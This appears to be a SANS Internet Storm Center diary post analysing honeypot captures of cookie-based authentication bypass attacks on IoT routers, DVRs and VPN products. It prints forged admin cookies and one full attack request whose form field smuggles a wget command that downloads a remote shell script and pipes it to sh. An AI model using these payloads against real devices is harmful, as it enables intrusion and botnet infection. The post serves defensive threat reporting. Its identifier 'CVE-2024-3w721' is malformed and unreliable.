One of the common infosec jokes is that sometimes, you do not need to "break" an application, but you have to log in. This is often the case for weak default passwords, which are common in IoT devices. However, an even easier method is to tell the application who you are. This does not even require a password! One of the sad recurring vulnerabilities is an HTTP cookie that contains the user's username or userid.

I took a quick look at our honeypot for cookies matching this pattern. Here is a selection:

Cookie: uid=1
Cookie: user=admin
Cookie: O3V2.0_user=admin
Cookie: admin_id=1; gw_admin_ticket=1
Cookie: RAS_Admin_UserInfo_UserName=admin
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.
Cookie: admin_id=1; gw_admin_ticket=1;
Cookie: ASP.NET_SessionId=; sid=admin

These are listed by frequency, with "uid=1" being the most commonly used value.

Let's see if we can identify some of the targeted vulnerabilities.

For the first one (uid=1), the URL hit is:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<some shell command>

CVE-2024-3w721: This is a relatively new (2024) OS command injection vulnerability in certain TBK DVRs. 

The second one is also an IoT-style issue:

POST /goform/set_LimitClient_cfg
User-Agent: Mozilla/5.0 ([email protected])
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Cookie: user=admin

time1=00:00-00:00&time2=00:00-00:00&mac=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xqe.sh%7Csh%26echo%20

CVE-2023-26801: Another "classic" IoT issue. This one affects LB-LINK wireless routers. This vulnerability may never have been patched, but I'm unsure how popular these routers are.

The cookie "O3V2.0_user=admin" is associated with a similar, but more recent issue affecting Tenda O3V2 wireless access points. Wireless internet service providers (WISPs) often use these outdoor access points. The vulnerability is similar to the issue above in that a POST request to "/goform/setPingInfo" is used to carry an OS injection payload—the common URL schemes like "/goform" point to similar firmware and likely similar vulnerabilities.

" admin_id=1; gw_admin_ticket=1": Google returned a reference to a post in Chinese, implying that this is a vulnerability in "Qi'anxin VPN" and allows arbitrary account and password modification.

"RAS_Admin_UserInfo_UserName=admin" affects the "Comai RAS System" software for managing remote desktop environments. Most references to the vulnerability are in Chinese. I did not see a CVE number, but the vulnerability appears to be three years old.

"CMX_SAVED_ID=zero; CMX_ADMIN_ID=science": No CVE, and there is no fix for this issue, which was discovered in 2021. Only affects a biometric access system :( (COMMAX. See https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php.

So in short: Yes... These vulnerabilities are out there, and they are exploited.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|